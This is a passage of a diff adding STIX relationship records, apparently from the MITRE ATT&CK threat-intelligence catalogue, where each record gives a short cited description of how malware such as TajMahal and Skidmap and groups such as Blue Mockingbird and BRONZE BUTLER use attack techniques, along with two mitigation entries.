+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index and compress files into a send queue for exfiltration.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5197fd7a-766f-45da-87f5-c469377460d1",
+ "type": "relationship",
+ "modified": "2020-06-15T21:19:30.918Z",
+ "created": "2020-06-08T17:22:35.549Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index files from drives, user profiles, and removable drives.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--bfd1c3ca-ea2c-4b0e-8b0a-815b8ebb4dfb",
+ "type": "relationship",
+ "modified": "2020-06-08T17:22:35.556Z",
+ "created": "2020-06-08T17:22:35.556Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--120b6ead-4c4a-4f99-8509-d4ae3d4afea6",
+ "type": "relationship",
+ "modified": "2020-06-15T21:01:55.437Z",
+ "created": "2020-06-08T17:22:35.613Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--44aab0bc-80d5-4c6b-9acf-ceb9cc30f443",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.276Z",
+ "created": "2020-06-08T18:06:36.276Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the Internet Explorer (IE) version on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8455e704-68fd-4610-b63d-0d124a660802",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.281Z",
+ "created": "2020-06-08T18:06:36.281Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify connected Apple devices.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ee1558f7-5b93-49c7-89c8-b3151cbefb84",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.311Z",
+ "created": "2020-06-08T18:06:36.311Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the MAC address on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--97e042c8-f1fe-4980-bc08-86cb7c6e1fc9",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.317Z",
+ "created": "2020-06-08T18:06:36.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify hardware information, the computer name, and OS information on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--179538d1-5770-42ef-976f-c0fd65faa1ea",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.319Z",
+ "created": "2020-06-08T18:06:36.319Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture keystrokes on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eda8746d-ef63-450b-ab75-c2c97d94db44",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.371Z",
+ "created": "2020-06-08T18:06:36.371Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal data from the clipboard of an infected host.(Citation: Kaspersky TajMahal April 2019)\n",
+ "relationship_type": "uses",
+ "id": "relationship--f283af63-1fdf-49d3-8a56-304c5be07a83",
+ "type": "relationship",
+ "modified": "2020-06-08T18:06:36.376Z",
+ "created": "2020-06-08T18:06:36.376Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to manage an automated queue of egress files and commands sent to its C2.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9cc4cd5d-7b10-4dd7-8fd9-90288aa8b5be",
+ "type": "relationship",
+ "modified": "2020-06-15T21:19:30.968Z",
+ "created": "2020-06-08T18:06:36.380Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to send collected files over its C2.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--655005cc-a289-4878-8dc0-64f0c7d167c4",
+ "type": "relationship",
+ "modified": "2020-06-15T21:19:30.982Z",
+ "created": "2020-06-08T18:06:36.384Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify running processes and associated plugins on an infected host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7f31ac80-5e21-4449-8bb3-9c2ad943dc08",
+ "type": "relationship",
+ "modified": "2020-06-08T18:08:06.453Z",
+ "created": "2020-06-08T18:08:06.453Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Registry modifications to specify a DLL payload.(Citation: RedCanary Mockingbird May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8b3f4fd5-9acd-49e5-bae5-6996ae46aa0f",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.809Z",
+ "created": "2020-06-08T19:45:34.975Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe to set environment variables.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--51548d6c-0aa9-4813-8493-3d9bbcd0617a",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.923Z",
+ "created": "2020-06-08T19:45:34.998Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has obfuscated the wallet address in the payload binary.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--85aecc08-dda1-4203-9dec-376f1d9d3cad",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:10.046Z",
+ "created": "2020-06-08T19:55:47.563Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+ "relationship_type": "mitigates",
+ "description": "Limit permissions for creating snapshots or backups in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)",
+ "id": "relationship--9ce9ab1f-b4fa-41e7-8302-11c30f918001",
+ "external_references": [
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-19T14:45:59.763Z",
+ "created": "2020-06-09T15:33:13.725Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+ "relationship_type": "mitigates",
+ "description": "Routinely check user permissions to ensure only the expected users have the capability to create snapshots and backups.",
+ "id": "relationship--6f8f4546-9e1c-42c9-b76f-863e51d6cb2a",
+ "type": "relationship",
+ "modified": "2020-06-19T14:45:59.783Z",
+ "created": "2020-06-09T15:33:13.737Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--0a8f5e7d-04d8-4ca8-a1d1-ea6a0ccc6140",
+ "type": "relationship",
+ "modified": "2020-06-09T15:33:13.766Z",
+ "created": "2020-06-09T15:33:13.766Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--a22e57a2-1d94-45eb-bc79-ec7106ae81c6",
+ "type": "relationship",
+ "modified": "2020-06-09T15:36:04.088Z",
+ "created": "2020-06-09T15:36:04.088Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used Right-to-Left Override to deceive victims into executing several strains of malware.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ff6fd36b-bc49-4df7-86f0-62b9d1fc9754",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.161Z",
+ "created": "2020-06-09T18:31:56.350Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has made use of Python-based remote access tools.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--138fb337-c378-43a3-bacb-54f40696fb6b",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.180Z",
+ "created": "2020-06-09T18:50:04.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has masked executables with document file icons including Word and Adobe PDF.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2f2432b0-d985-41d8-bc47-e4aa1dbf8372",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.182Z",
+ "created": "2020-06-09T18:50:04.600Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used tools to enumerate software installed on an infected host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--54e0e380-aef8-4c63-9792-ebda05affee6",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.166Z",
+ "created": "2020-06-09T20:34:21.093Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--0bb4fb8a-0b0f-46c6-820b-d46c5f98fa12",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.131Z",
+ "created": "2020-06-09T21:23:39.119Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has created a fake rm binary to replace the legitimate Linux binary.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--30c69dcc-9cf7-4352-a30c-0e7bc86b38e7",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.762Z",
+ "created": "2020-06-09T21:23:39.156Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check whether the infected system\u2019s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--709d0737-e2ac-4ce3-9772-0dbc06f9667e",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.207Z",
+ "created": "2020-06-09T21:23:39.163Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to install several loadable kernel modules (LKMs) on infected machines.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--513128aa-573e-4185-b0dc-88738edacb65",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.202Z",
+ "created": "2020-06-09T21:23:39.165Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--759185fe-d576-43f5-afac-acd653e5fcf4",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.204Z",
+ "created": "2020-06-09T21:23:39.171Z"
+ },
